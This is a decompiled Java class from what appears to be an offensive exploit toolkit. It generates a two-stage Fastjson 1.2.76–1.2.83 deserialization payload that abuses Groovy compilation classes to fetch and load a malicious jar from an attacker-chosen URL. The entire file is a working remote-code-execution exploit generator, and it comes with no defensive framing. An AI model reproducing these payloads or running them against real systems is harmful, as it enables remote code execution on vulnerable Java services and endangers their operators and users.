package com.ar3h.chains.gadget.impl.fastjson;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;

@GadgetAnnotation(name = "Groovy 1.2.83", description = "需要发送两个payload才能实现远程加载 groovy jar\n恶意 Groovy jar 包可在 「OtherPayload -> GroovyJarConvert」 中生成", dependencies = {"org.codehaus:groovy", "1.2.76 <= fastjson <= 1.2.83 autoTypeEnabled"})
@GadgetTags(tags = {Tag.FastjsonPayload, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/fastjson/FastjsonGroovy.class */
public class FastjsonGroovy implements Gadget {

    @Param(name = "加载jar包的url")
    public String jarUrl = "http://127.0.0.1:50000/EvalGroovy.jar";
    public static String template1 = "{\n    \"x1\": {\n        \"@type\": \"java.lang.Exception\",\n        \"@type\": \"org.codehaus.groovy.control.CompilationFailedException\",\n        \"unit\": {}\n    }\n}";
    public static String template2 = "{\n    \"x2\": {\n        \"@type\": \"org.codehaus.groovy.control.ProcessingUnit\",\n        \"@type\": \"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit\",\n        \"config\": {\n            \"@type\": \"org.codehaus.groovy.control.CompilerConfiguration\",\n            \"classpathList\": \"%s\"\n        }\n    }\n}";

    public Object getObject() {
        return "[INFO] Step1:\n" + template1 + "\n\n[INFO] Step2:\n" + String.format(template2, this.jarUrl);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
